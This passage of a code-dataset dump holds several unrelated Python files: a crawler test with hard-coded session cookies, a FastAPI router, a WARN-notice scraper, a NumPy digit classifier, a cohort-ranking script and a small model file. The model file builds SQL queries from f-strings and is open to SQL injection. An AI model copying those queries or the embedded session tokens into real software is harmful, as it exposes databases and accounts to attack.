'v=A4g1_bTDf-ua1ZNF7Nga0u-AWf2fMezEzpTAvEI71rj2SCYj6kG8yx6lkEyR; session=85fa876c-984a-4e55-8426-d32588907af4.uY_ISWk0OFIYlPQBuplTQv2lyNY',\n    }\n\n\nt = int(time.time()*1000)\nprint(t)\nsign = base64.b64encode(str(t).encode()).decode()\nprint(sign)\ndata = {\n    'page': 3,\n    'count': 10,\n    '_signature': sign\n}\nproxies = {\n    'http': 'http://127.0.0.1:8899',\n    'https': 'http://127.0.0.1:8899'\n}\nresp = requests.post(url, headers=headers, data=data)  # send the signed form data\nprint(resp.status_code)\n","repo_name":"konatax/crawler","sub_path":"网络者/【简单】09_未完成/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33895563776","text":"from typing import Annotated\n\nfrom beanie import PydanticObjectId\nfrom beanie.operators import In\nfrom fastapi import APIRouter, HTTPException, Path, Query, status\n\nfrom tekst.auth import OptionalUserDep\nfrom tekst.models.layer import LayerBaseDocument, LayerNodeCoverage\nfrom tekst.models.text import (\n    NodeDocument,\n    NodeRead,\n)\nfrom tekst.models.unit import UnitBaseDocument\n\n\n# initialize unit router\nrouter = APIRouter(\n    prefix=\"/browse\",\n    tags=[\"browse\"],\n    responses={status.HTTP_404_NOT_FOUND: {\"description\": \"Not found\"}},\n)\n\n\n@router.get(\"/unit-siblings\", response_model=list[dict], status_code=status.HTTP_200_OK)\nasync def get_unit_siblings(\n    user: OptionalUserDep,\n    layer_id: Annotated[\n        PydanticObjectId,\n        Query(description=\"ID of layer the requested units belong to\", alias=\"layerId\"),\n    ],\n    parent_node_id: Annotated[\n        PydanticObjectId | None,\n        Query(\n            description=\"ID of node for which siblings to get associated units for\",\n            alias=\"parentNodeId\",\n        ),\n    ] = None,\n) -> list[dict]:\n    \"\"\"\n    Returns a list of all data layer units belonging to the data layer\n    with the given ID, associated to nodes that are children of the parent node\n    with the given ID.\n\n    As the resulting list may contain units of arbitrary type, the\n    returned unit objects cannot be typed to their precise layer unit type.\n    Also, the returned unit objects have an additional property containing their\n    respective node's label, level and position.\n    \"\"\"\n\n    layer = await LayerBaseDocument.find_one(\n        LayerBaseDocument.id == layer_id,\n        LayerBaseDocument.allowed_to_read(user),\n        with_children=True,\n    )\n\n    if not layer:\n        raise HTTPException(\n            status_code=status.HTTP_404_NOT_FOUND,\n            detail=f\"Layer with ID {layer_id} could not be found.\",\n        )\n\n    nodes = await NodeDocument.find(\n        NodeDocument.text_id == layer.text_id,\n        NodeDocument.level == layer.level,\n        NodeDocument.parent_id == parent_node_id,\n    ).to_list()\n\n    unit_docs = await UnitBaseDocument.find(\n        UnitBaseDocument.layer_id == layer_id,\n        In(UnitBaseDocument.node_id, [node.id for node in nodes]),\n        with_children=True,\n    ).to_list()\n\n    return [unit_doc.model_dump(camelize_keys=True) for unit_doc in unit_docs]\n\n\n@router.get(\n    \"/nodes/path\", response_model=list[NodeRead], status_code=status.HTTP_200_OK\n)\nasync def get_node_path(\n    text_id: Annotated[PydanticObjectId, Query(alias=\"textId\")],\n    level: int,\n    position: int,\n) -> list[NodeDocument]:\n    \"\"\"\n    Returns the text node path from the node with the given level/position\n    as the last element, up to its most distant ancestor node\n    on structure level 0 as the first element of an array.\n    \"\"\"\n    node_doc = await NodeDocument.find_one(\n        NodeDocument.text_id == text_id,\n        NodeDocument.level == level,\n        
NodeDocument.position == position,\n )\n if not node_doc:\n return []\n # construct path up to root node\n path = [node_doc]\n parent_id = node_doc.parent_id\n while parent_id:\n parent_doc = await NodeDocument.get(parent_id)\n if parent_doc:\n path.insert(0, parent_doc)\n parent_id = parent_doc.parent_id\n else:\n parent_id = None\n\n return path\n\n\n@router.get(\n \"/nodes/{id}/path/options-by-head\",\n response_model=list[list[NodeRead]],\n status_code=status.HTTP_200_OK,\n)\nasync def get_path_options_by_head_id(\n node_id: Annotated[PydanticObjectId, Path(alias=\"id\")]\n) -> list[list[NodeDocument]]:\n \"\"\"\n Returns the options for selecting text locations derived from the node path of\n the node with the given ID as head.\n \"\"\"\n node_doc = await NodeDocument.get(node_id)\n if not node_doc:\n return []\n # construct options for this path up to root node\n options = []\n while node_doc and node_doc.parent_id:\n siblings = await NodeDocument.find(\n NodeDocument.parent_id == node_doc.parent_id\n ).to_list()\n options.insert(0, siblings)\n node_doc = await NodeDocument.get(node_doc.parent_id)\n # lastly, insert options for root level\n if node_doc:\n root_lvl_options = await NodeDocument.find(\n NodeDocument.text_id == node_doc.text_id,\n NodeDocument.level == 0,\n ).to_list()\n options.insert(0, root_lvl_options)\n return options\n\n\n@router.get(\n \"/nodes/{id}/path/options-by-root\",\n response_model=list[list[NodeRead]],\n status_code=status.HTTP_200_OK,\n)\nasync def get_path_options_by_root_id(\n node_id: Annotated[PydanticObjectId, Path(alias=\"id\")]\n) -> list[list[NodeDocument]]:\n \"\"\"\n Returns the options for selecting text locations derived from the node path of\n the node with the given ID as root. At each level, the first option is taken\n as the basis for the next level.\n \"\"\"\n node_doc = await NodeDocument.get(node_id)\n if not node_doc:\n return []\n # construct options for this path up to max_level\n options = []\n while node_doc:\n children = await NodeDocument.find(\n NodeDocument.parent_id == node_doc.id\n ).to_list()\n if len(children) == 0:\n break\n options.append(children)\n node_doc = children[0]\n return options\n\n\n@router.get(\"/layers/{id}/coverage\", status_code=status.HTTP_200_OK)\nasync def get_layer_coverage_data(\n layer_id: Annotated[PydanticObjectId, Path(alias=\"id\")], user: OptionalUserDep\n) -> list[LayerNodeCoverage]:\n layer_doc = await LayerBaseDocument.find_one(\n LayerBaseDocument.id == layer_id,\n LayerBaseDocument.allowed_to_read(user),\n with_children=True,\n )\n if not layer_doc:\n raise HTTPException(\n status.HTTP_404_NOT_FOUND, detail=f\"No layer with ID {layer_id}\"\n )\n return (\n await NodeDocument.find(\n NodeDocument.text_id == layer_doc.text_id,\n NodeDocument.level == layer_doc.level,\n )\n .sort(+NodeDocument.position)\n .aggregate(\n [\n {\n \"$lookup\": {\n \"from\": \"units\",\n \"localField\": \"_id\",\n \"foreignField\": \"node_id\",\n \"as\": \"units\",\n }\n },\n {\n \"$project\": {\n \"label\": 1,\n \"position\": 1,\n \"covered\": {\"$gt\": [{\"$size\": \"$units\"}, 0]},\n }\n },\n ],\n projection_model=LayerNodeCoverage,\n )\n .to_list()\n )\n","repo_name":"VedaWebProject/Tekst","sub_path":"Tekst-API/tekst/routers/browse.py","file_name":"browse.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"29664371253","text":"import logging\nimport re\nfrom pathlib import Path\n\nimport requests\nfrom bs4 
import BeautifulSoup\n\nfrom .. import utils\nfrom ..cache import Cache\n\n__authors__ = [\"zstumgoren\", \"Dilcia19\"]\n__tags__ = [\"html\"]\n__source__ = {\n \"name\": \"Washington Employment Security Department\",\n \"url\": \"https://esd.wa.gov/about-employees/WARN\",\n}\n\nlogger = logging.getLogger(__name__)\n\n\ndef scrape(\n data_dir: Path = utils.WARN_DATA_DIR,\n cache_dir: Path = utils.WARN_CACHE_DIR,\n) -> Path:\n \"\"\"\n Scrape data from Washington.\n\n Arguments:\n data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)\n cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)\n\n Returns: the Path where the file is written\n \"\"\"\n # Set the cache\n cache = Cache(cache_dir)\n\n output_rows = []\n\n with requests.Session() as session:\n # Request the initial page\n url = \"https://fortress.wa.gov/esd/file/warn/Public/SearchWARN.aspx\"\n user_agent = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0\"\n r = utils.get_url(url, user_agent=user_agent, session=session)\n\n # Save it to the cache\n html = r.text\n cache.write(\"wa/source.html\", html)\n\n # Parse out the headers\n soup = BeautifulSoup(html, \"html5lib\")\n table_list = soup.find_all(\"table\")\n first_table = table_list[0]\n first_row = first_table.find_all(\"tr\")[2]\n th_list = first_row.find_all(\"th\")\n headers = [_clean_text(th.text) for th in th_list]\n output_rows.append(headers)\n\n # Parse the data\n row_list = _parse_table(first_table)\n output_rows.extend(row_list)\n\n # Start jumping through the pages\n soup_content = BeautifulSoup(r.content, \"html5lib\")\n\n page = 2\n while True:\n try:\n # Post for the next page\n formdata = {\n \"__EVENTTARGET\": \"ucPSW$gvMain\",\n \"__EVENTARGUMENT\": f\"Page${page}\",\n \"__VIEWSTATE\": soup_content.find(\n \"input\", attrs={\"name\": \"__VIEWSTATE\"}\n )[\"value\"],\n \"__EVENTVALIDATION\": soup_content.find(\n \"input\", attrs={\"name\": \"__EVENTVALIDATION\"}\n )[\"value\"],\n }\n next = session.post(url, data=formdata)\n logger.debug(f\"Page status is {next.status_code} for {url}\")\n\n # Update the input variables\n soup_content = BeautifulSoup(next.content, \"html5lib\")\n\n # Cache the html\n html = next.text\n cache.write(f\"wa/{page}.html\", html)\n\n # Parse out the data\n soup = BeautifulSoup(html, \"html5lib\")\n table_list = soup.find_all(\"table\")\n first_table = table_list[0]\n row_list = _parse_table(first_table)\n output_rows.extend(row_list)\n\n # Up the page number\n page += 1\n\n # Once it fails, we're done\n except Exception:\n break\n\n # Set the export path\n data_path = data_dir / \"wa.csv\"\n\n # Write out the file\n utils.write_rows_to_csv(data_path, output_rows)\n\n # Return the path to the file\n return data_path\n\n\ndef _parse_table(table) -> list:\n # Parse the cells\n row_list = []\n for row in table.find_all(\"tr\"):\n cell_list = row.find_all([\"td\"])\n if not cell_list:\n continue\n cell_list = [_clean_text(c.text) for c in cell_list]\n row_list.append(cell_list)\n\n # Return it with a slice to cut the cruft\n return row_list[2 : len(row_list) - 2]\n\n\ndef _clean_text(text):\n \"\"\"Clean up the provided HTML snippet.\"\"\"\n if text is None:\n return \"\"\n text = re.sub(r\"\\n\", \" \", text)\n text = re.sub(r\"\\s+\", \" \", text)\n return text.strip()\n\n\nif __name__ == \"__main__\":\n 
scrape()\n","repo_name":"biglocalnews/warn-scraper","sub_path":"warn/scrapers/wa.py","file_name":"wa.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"73186842987","text":"import utils.meta\n\n@utils.meta.JSONClass\nclass LearningInfo:\n\n def __init__(self):\n super().__init__()\n self.confidence = []\n self.patterns_list = []\n self.pattern_width = []\n self.pattern_height = []\n self.pattern_timestamp = []\n self.segment_center_list = []\n self.patterns_value = []\n\n def __str__(self):\n return str(self.to_json())","repo_name":"hastic-zzz/analytics","sub_path":"analytics/analytic_types/learning_info.py","file_name":"learning_info.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"16875341906","text":"year = int(input(\"Enter Year:\"))\n\n#1 If the year is evenly divisible by 4, go to step 2. Otherwise, go to step 5.\n#2 If the year is evenly divisible by 100, go to step 3. Otherwise, go to step 4.\n#3 If the year is evenly divisible by 400, go to step 4. Otherwise, go to step 5.\n#4 The year is a leap year (it has 366 days).\n#5 The year is not a leap year (it has 365 days).\nleap_year = \"The year is a leap year (it has 366 days).\"\nnormal_year = \"The year is not a leap year (it has 365 days).\"\nif year % 4 == 0:\n if year % 100 == 0:\n if year % 400 == 0:\n print(leap_year)\n else:\n print(normal_year)\n else:\n print(leap_year)\nelse:\n print(normal_year)","repo_name":"smirachowdhary/Data-Structures-and-Algorithms","sub_path":"Decisions/Answers13_CheckIfGivenDateFallsInLeapYear.py","file_name":"Answers13_CheckIfGivenDateFallsInLeapYear.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35533811524","text":"import numpy as np \nimport h5py\nimport cv2\nimport os\nfrom glob import glob\n\n\n#////////////////////////testing some images//////////////////////////\ndef test():\n\tindex = 0\n\tfor i in range(10):\n\t\tcv2.imshow(\"image\",trainX[i])\n\t\tcv2.waitKey(1000)\n\t\tcv2.destroyAllWindows()\n\t\tprint(trainy[i])\n\n\n# n = 0 to n and arr of shape(x,)\ndef Y_generator(n,arr):\n\tx = arr.shape[0]\n\tY = np.zeros([n+1,x])\n\tfor i in range(x):\n\t\tnum = arr[i]\n\t\tY[num][i] = 1\n\n\treturn Y\n\n# test = np.array([0,1,2,3])\n# print(Y_generator(3,test))\n\n\n#/////////////// start writing neural network functions //////////////////////////////\n#retrieving parameters dictionary\n\n\n\n\n\ndef initialize_parameters(layers_dim):\n\tparameters = {}\n\n\t# for i in range(1,len(layers_dim)):\n\t# \tni = layers_dim[i-1]\n\t# \tni_next = layers_dim[i]\n\t# \tparameters[\"W\" + str(i)] = np.random.randn(ni_next,ni)*0.01\n\t# \tparameters[\"b\" + str(i)] = np.zeros([ni_next,1],dtype=int)\n\twith h5py.File(\"parametersnew.h5\",\"r\")as hf:\n\t\tfor l in range(3):\n\t\t\tnameW = \"W\" + str(l+1)\n\t\t\tnameb = \"b\" + str(l+1)\n\t\t\tparameters[nameW] = hf[nameW][:]\n\t\t\tparameters[nameb] = hf[nameb][:]\n\n\n\treturn parameters\n\n\ndef linear_forward(A,W,b):\n\tcache = (A,W,b)\n\tZ = np.matmul(W,A) + b\n\treturn Z,cache\n\ndef relu(Z):\n\tmask = (Z > 0)\n\tA = Z*mask\n\treturn A,Z\n\ndef sigmoid(Z):\n\tA = 1/(1+ np.exp(-Z))\n\treturn A,Z\n\n\ndef softmax(Z):\n\ttemp = np.exp(Z)\n\ttemp2 = temp.sum(axis=0)\n\tA = temp/temp2\n\treturn A,Z\n\ndef 
linear_activation_forward(A_prev,W,b,activation):\n\tZ,lin_cache = linear_forward(A_prev,W,b)\n\n\tif(activation == \"relu\"):\n\t\tA,act_cache = relu(Z)\n\t\t\n\n\telif(activation == \"sigmoid\"):\n\t\tA,act_cache = sigmoid(Z)\n\n\telif(activation == \"softmax\"):\n\t\tA,act_cache = softmax(Z)\n\n\tcache = (lin_cache,act_cache)\n\treturn A,cache\n\n\ndef L_model_forward(X, parameters):\n\n    caches = []\n    A = X\n    L = len(parameters) // 2 # number of layers in the neural network\n    \n    # Implement [LINEAR -> RELU]*(L-1). Add \"cache\" to the \"caches\" list.\n    for l in range(1, L):\n        A_prev = A \n        ### START CODE HERE ### (≈ 2 lines of code)\n        Wl = parameters[\"W\" + str(l)]\n        Bl = parameters[\"b\" + str(l)]\n        A, cache = linear_activation_forward(A_prev,Wl,Bl,\"relu\")\n        caches.append(cache)\n        ### END CODE HERE ###\n    \n    # Implement LINEAR -> SOFTMAX for the output layer. Add \"cache\" to the \"caches\" list.\n    ### START CODE HERE ### (≈ 2 lines of code)\n    WL = parameters[\"W\" + str(L)]\n    BL = parameters[\"b\" + str(L)]\n    AL, cache = linear_activation_forward(A,WL,BL,\"softmax\")\n    caches.append(cache)\n    ### END CODE HERE ###\n    \n    return AL, caches\n\n\ndef compute_cost(AL, Y):\n    m = Y.shape[1]\n\n    # Compute loss from aL and y.\n    ### START CODE HERE ### (≈ 1 lines of code)\n    cost = np.sum(Y*np.log(AL))*(-1/m)\n    ### END CODE HERE ###\n    \n    cost = np.squeeze(cost)      # To make sure your cost's shape is what we expect (e.g. this turns [[17]] into 17).\n    assert(cost.shape == ())\n    \n    return cost\n\n\n\ndef linear_backward(dZ, cache):\n    \n    A_prev, W, b = cache\n    m = A_prev.shape[1]\n\n    ### START CODE HERE ### (≈ 3 lines of code)\n    dW = np.matmul(dZ,A_prev.T)*(1/m)\n    db = np.sum(dZ,axis=1,keepdims=True)*(1/m)\n    dA_prev = np.matmul(W.T,dZ)\n    ### END CODE HERE ###\n    \n    assert (dA_prev.shape == A_prev.shape)\n    assert (dW.shape == W.shape)\n    assert (db.shape == b.shape)\n    \n    return dA_prev, dW, db\n\ndef linear_activation_backward(dA, cache, activation):\n    \n    linear_cache, activation_cache = cache\n    \n    if activation == \"relu\":\n        ### START CODE HERE ### (≈ 2 lines of code)\n        dZ = dA*(activation_cache > 0)  # match the forward relu mask (Z > 0)\n        dA_prev, dW, db = linear_backward(dZ,linear_cache)\n        ### END CODE HERE ###\n        \n    elif activation == \"sigmoid\":\n        ### START CODE HERE ### (≈ 2 lines of code)\n        dZ = dA*(sigmoid(activation_cache)[0]*(1-sigmoid(activation_cache)[0]))\n        dA_prev, dW, db = linear_backward(dZ,linear_cache)\n        ### END CODE HERE ###\n    elif activation == \"softmax\":\n    \tdZ = softmax(activation_cache)[0] - dA # Y_hat - Y is derivative wrt Z in softmax\n    \tdA_prev, dW, db = linear_backward(dZ,linear_cache)\n    \n    return dA_prev, dW, db\n\n\n\ndef L_model_backward(AL, Y, caches):\n    \n    grads = {}\n    L = len(caches) # the number of layers\n    m = AL.shape[1]\n    Y = Y.reshape(AL.shape) # after this line, Y is the same shape as AL\n    \n    # Initializing the backpropagation\n    ### START CODE HERE ### (1 line of code)\n    dAL = Y  # with softmax + cross-entropy the backward pass consumes Y directly (dZ = AL - Y)\n\n    \n    # Lth layer (SOFTMAX -> LINEAR) gradients. Inputs: \"dAL, current_cache\". Outputs: \"grads[\"dAL-1\"], grads[\"dWL\"], grads[\"dbL\"]\n    ### START CODE HERE ### (approx. 2 lines)\n    current_cache = caches[L-1]\n    grads[\"dA\" + str(L-1)], grads[\"dW\" + str(L)], grads[\"db\" + str(L)] = linear_activation_backward(dAL,current_cache,\"softmax\")\n    ### END CODE HERE ###\n    \n    # Loop from l=L-2 to l=0\n    for l in reversed(range(L-1)):\n        # lth layer: (RELU -> LINEAR) gradients.\n        # Inputs: \"grads[\"dA\" + str(l + 1)], current_cache\". 
Outputs: \"grads[\"dA\" + str(l)] , grads[\"dW\" + str(l + 1)] , grads[\"db\" + str(l + 1)] \n ### START CODE HERE ### (approx. 5 lines)\n current_cache = caches[l]\n dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads[\"dA\"+str(l+1)],current_cache,\"relu\")\n grads[\"dA\" + str(l)] = dA_prev_temp\n grads[\"dW\" + str(l + 1)] = dW_temp\n grads[\"db\" + str(l + 1)] = db_temp\n ### END CODE HERE ###\n\n return grads\n\n\ndef update_parameters(parameters, grads, learning_rate):\n \n L = len(parameters) // 2 # number of layers in the neural network\n\n # Update rule for each parameter. Use a for loop.\n ### START CODE HERE ### (≈ 3 lines of code)\n for l in range(L):\n parameters[\"W\" + str(l+1)] = parameters[\"W\" + str(l+1)] - learning_rate*grads[\"dW\" + str(l+1)]\n parameters[\"b\" + str(l+1)] = parameters[\"b\" + str(l+1)] - learning_rate*grads[\"db\" + str(l+1)]\n ### END CODE HERE ###\n return parameters\n\n\n\ndef L_layer_model(X, Y, layers_dims, learning_rate = 0.07, num_iterations = 3000, print_cost=False):#lr was 0.009\n\n costs = [] # keep track of cost\n \n # Parameters initialization. (≈ 1 line of code)\n ### START CODE HERE ###\n parameters = initialize_parameters(layers_dims)\n ### END CODE HERE ###\n \n adam= {}\n\n\n # Loop (gradient descent)\n for i in range(0, num_iterations):\n\n # Forward propagation: [LINEAR -> RELU]*(L-1) -> LINEAR -> SIGMOID.\n ### START CODE HERE ### (≈ 1 line of code)\n AL, caches = L_model_forward(X,parameters)\n ### END CODE HERE ###\n \n # Compute cost.\n ### START CODE HERE ### (≈ 1 line of code)\n cost = compute_cost(AL,Y)\n ### END CODE HERE ###\n \n # Backward propagation.\n ### START CODE HERE ### (≈ 1 line of code)\n grads = L_model_backward(AL,Y,caches)\n ### END CODE HERE ###\n \n # Update parameters.\n ### START CODE HERE ### (≈ 1 line of code)\n\n\n parameters = update_parameters(parameters,grads,learning_rate)\n ### END CODE HERE ###\n \n # Print the cost every 100 training example\n if print_cost and i % 30 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n if print_cost and i % 100 == 0:\n costs.append(cost)\n \n # # plot the cost\n # plt.plot(np.squeeze(costs))\n # plt.ylabel('cost')\n # plt.xlabel('iterations (per hundreds)')\n # plt.title(\"Learning rate =\" + str(learning_rate))\n # plt.show()\n \n return parameters\n\n\n\n# parameters = L_layer_model(train_x, train_y, layers_dims, num_iterations = 2500, print_cost = True)\n\n\n\n#///////////////////////////////////////////////training session//////////////////////////////////////////\n#////////////////////@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@///////////\n\n# load dataset\npath = os.path.abspath('..')\npath1 = os.path.join(path,\"dataset\",\"train.hdf5\")\npath2 = os.path.join(path,\"dataset\",\"test.hdf5\") \n\n##loading training set\nwith h5py.File(path1,\"r\") as hf:\n\ttrainX= hf[\"image\"][:]\n\ttrainy = hf[\"label\"][:]\n\n\n## loading test set\nwith h5py.File(path2,\"r\") as hf:\n\ttestX= hf[\"image\"][:]\n\ttesty = hf[\"label\"][:]\n\n\n# trainy1 = Y_generator(9,trainy)\n# trainX = trainX.reshape(trainX.shape[0],-1)/255\n# trainX = trainX.T\n\n#define layers dimension\nlayers_dims = [784,16,16,10]\n\n\n# parameters = L_layer_model(trainX, trainy1, layers_dims, num_iterations = 1500, print_cost = True)\n\n\n# with h5py.File(\"parameters.h5\",\"a\")as hf:\n# \tfor l in range(len(parameters)//2):\n# \t\tnameW = \"W\" + str(l+1)\n# \t\tnameb = \"b\" + str(l+1)\n# \t\tWl = parameters[nameW]\n# \t\tbl = 
parameters[nameb]\n# \t\thf.create_dataset(nameW,data=Wl)\n# \t\thf.create_dataset(nameb,data=bl)\n\n\n#///////////////////////////////////////////////////////Testing session////////////////////////////////\n#now we got values of parameters its testing time\n\n\n\n\n# print(testX.shape)\n\n\n\n\n\n# AL_train,caches = L_model_forward(trainX,parameters)\n# AL_test,caches = L_model_forward(testX,parameters)\n\n# ans_train = AL_train.argmax(axis=0)\n# ans_test = AL_test.argmax(axis=0)\n\n# #train accuracy\n# accuracy_train = np.sum(ans_train == trainy)/len(trainy)\n# accuracy_test = np.sum(ans_test == testy)/len(testy)\n\n# print(\"train accuracy \",accuracy_train)\n# print(\"test accuracy \", accuracy_test)\n\n# got 95 % accuracy //////////////////////////////////\n\n\nparameters = {}\n\nwith h5py.File(\"parameters.h5\",\"r\")as hf:\n\tfor l in range(3):\n\t\tnameW = \"W\" + str(l+1)\n\t\tnameb = \"b\" + str(l+1)\n\t\tparameters[nameW] = hf[nameW][:]\n\t\tparameters[nameb] = hf[nameb][:]\n\n\n\ndef make_image_path_list():\n\t#abs_path of current directory\n\tPATH = os.path.abspath('.')\n\n\t#join the test and train folders path\n\tSource= os.path.join(PATH,'images')\n\tprint(Source)\n\t#search for png files in folder then sort the images according to their names\n\timages = glob(os.path.join(Source,\"*.jpeg\"))\n\tprint(images)\n\treturn images\n\nimages = make_image_path_list()\n\n\n\n#///////////////////////////////// testing your images //////////////////////////\n\nfor i in images:\n\tfilename = i\n\timg = cv2.imread(filename)\n\tgray_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\tgray_resized = cv2.resize(gray_img,(28,28),interpolation=cv2.INTER_AREA)\n\n\tgray_resized = ~gray_resized\n\n\n\tret,gray_resized = cv2.threshold(gray_resized,127,255,cv2.THRESH_BINARY)\n\n\tkernel = np.ones((2,2), np.uint8) \n\n\tgray_resized = cv2.dilate(gray_resized, kernel, iterations=1) \n\t# print(gray_resized)\n\tX = gray_resized.reshape(-1)\n\tX = X.reshape(len(X),1)\n\tX = X/255\n\n\tAL,caches = L_model_forward(X,parameters)\n\t# print(AL)\n\tprint(AL.argmax(axis=0))\n\n\tcv2.imshow(\"full\",gray_img)\n\tcv2.imshow(\"resized\",gray_resized)\n\tcv2.waitKey(4000)\n\tcv2.destroyAllWindows()\n\n\t\n\n\n\n# gray_resized = testX[1]\n# print(gray_resized)\n\n# cv2.imshow(\"resized\",gray_resized)\n# cv2.waitKey(5000)\n# cv2.destroyAllWindows()\n\n# X = gray_resized.reshape(-1)\n# X = X.reshape(len(X),1)\n# X = X/255\n\n\n# AL,caches = L_model_forward(X,parameters)\n# print(AL)\n# print(AL.argmax(axis=0))\n\n\n\n","repo_name":"gprince349/Handwritten-word-recognizer","sub_path":"digitRec_Ashish/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13515658404","text":"import datetime\nimport logging\n\nimport localflavor\n\nfrom paying_for_college.models.disclosures import (\n DEFAULT_EXCLUSIONS,\n HIGHEST_DEGREES,\n School,\n)\n\n\nSTATES = sorted(\n [tup[0] for tup in localflavor.us.us_states.CONTIGUOUS_STATES]\n + [tup[0] for tup in localflavor.us.us_states.NON_CONTIGUOUS_STATES]\n + [\"PR\"]\n)\nDEGREE_COHORTS = {k: [] for k in HIGHEST_DEGREES.keys()}\nlogger = logging.getLogger(__name__)\n\n\ndef get_grad_level(school):\n \"\"\"Consider degrees higher than graduate level '4' as graduate degrees.\"\"\"\n if int(school.degrees_highest) > 4:\n return \"4\"\n else:\n return school.degrees_highest\n\n\ndef build_base_cohorts():\n \"\"\"\n Pre-build the base highest-degree cohorts.\n\n 
DEFAULT_EXCLUSIONS are the primary keys for the home offices of schools\n or school systems, plus our fake demo school, 999999.\n \"\"\"\n global DEGREE_COHORTS\n base_query = (\n School.objects.filter(operating=True, state__in=STATES)\n .exclude(pk__in=DEFAULT_EXCLUSIONS)\n .exclude(degrees_highest=\"\")\n )\n for key in DEGREE_COHORTS:\n DEGREE_COHORTS[key] += [\n school for school in base_query if get_grad_level(school) == key\n ]\n return base_query\n\n\ndef calculate_percentile_rank(array, score):\n \"\"\"Get a school score's percentile rank from an array of cohort scores.\"\"\"\n true_false_array = [value <= score for value in array]\n if len(true_false_array) == 0:\n return\n raw_rank = float(sum(true_false_array)) / len(true_false_array)\n return int(round(raw_rank * 100))\n\n\ndef rank_by_metric(school, cohort, metric):\n \"\"\"Return a school's percentile rank among a cohort by 3 metrics.\"\"\"\n values = [\n getattr(s, metric) for s in cohort if getattr(s, metric) is not None\n ]\n payload = {\"cohort_count\": len(values)}\n array = [float(val) for val in values]\n target_value = float(getattr(school, metric))\n payload.update(\n {\"percentile_rank\": calculate_percentile_rank(array, target_value)}\n )\n return payload\n\n\ndef run(single_school=None):\n \"\"\"Get percentile rankings for schools by degree, control, and state.\"\"\"\n count = 0\n starter = datetime.datetime.now()\n base_query = build_base_cohorts()\n if single_school:\n base_query = base_query.filter(pk=single_school)\n for school in base_query:\n by_degree = {}\n by_state = {}\n by_control = {}\n count += 1\n if count % 500 == 0: # pragma: no cover\n logger.info(\"{} schools processed\".format(count))\n # degree_cohort is the default, national base cohort\n # base query weeds out schools without state or degrees_highest values\n degree_cohort = DEGREE_COHORTS.get(get_grad_level(school))\n state_cohort = [\n s\n for s in degree_cohort\n if s and s.state and s.state == school.state\n ]\n # For school control, we want cohorts only for public and private;\n # We do not want a special cohort of for-profit schools\n if not school.control:\n control_cohort = None\n elif school.control == \"Public\":\n control_cohort = [\n s for s in degree_cohort if s.control == school.control\n ]\n else:\n control_cohort = [\n s for s in degree_cohort if s.control != \"Public\"\n ]\n for metric in [\"grad_rate\", \"repay_3yr\", \"median_total_debt\"]:\n if getattr(school, metric) is None:\n by_state.update({metric: None})\n by_control.update({metric: None})\n by_degree.update({metric: None})\n else:\n if state_cohort:\n by_state.update(\n {metric: rank_by_metric(school, state_cohort, metric)}\n )\n if control_cohort:\n by_control.update(\n {\n metric: rank_by_metric(\n school, control_cohort, metric\n )\n }\n )\n if degree_cohort:\n by_degree.update(\n {metric: rank_by_metric(school, degree_cohort, metric)}\n )\n school.cohort_ranking_by_state = by_state\n school.cohort_ranking_by_control = by_control\n school.cohort_ranking_by_highest_degree = by_degree\n school.save()\n logger.info(\n \"\\nCohort script took {} to process {} schools\".format(\n datetime.datetime.now() - starter, count\n )\n )\n","repo_name":"cfpb/consumerfinance.gov","sub_path":"cfgov/paying_for_college/disclosures/scripts/process_cohorts.py","file_name":"process_cohorts.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"37"} +{"seq_id":"70532800109","text":"from data.data_base 
import DataBase\nfrom data.models import model_user\n\ndef register_company(name, phone, idUser):\n\n    # NOTE: building SQL with f-strings is open to SQL injection;\n    # a parameterized query would be safer here\n    register_company_sql = f\"\"\"\n    INSERT INTO EMPRESAS(NOMBRE, TELEFONO, ID_USUARIO)\n    VALUES ('{name}','{phone}', '{idUser}')\n    \"\"\"\n\n    bd = DataBase()\n    bd.ejecutar_sql(register_company_sql)\n\n\n# Returns the company id\ndef search_id_company(email):\n\n    idUser = model_user.search_id_user(email)\n    \n\n    select_id_company = f\"\"\"\n    SELECT ID_EMPRESA FROM EMPRESAS WHERE ID_USUARIO='{idUser[0][0]}'\n    \"\"\" \n    \n    db = DataBase()\n    idCompany = db.ejecutar_sql(select_id_company)\n\n    return idCompany[0][0]\n\n# Gets the company data\ndef get_data_company(idUser): \n\n    select_id_company = f\"\"\"\n    SELECT * FROM EMPRESAS WHERE ID_USUARIO='{idUser}'\n    \"\"\" \n    \n    db = DataBase()\n    data_company = db.ejecutar_sql(select_id_company)\n    \n    \n    dict_company = {\n        'idCompany': data_company[0][0],\n        'nameCompany': data_company[0][1],\n        'tel': data_company[0][2],\n        'idUser': data_company[0][3]\n    }\n\n    \n    return dict_company","repo_name":"ericseparovic/The-Clock","sub_path":"data/models/model_company.py","file_name":"model_company.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8885353431","text":"from django import 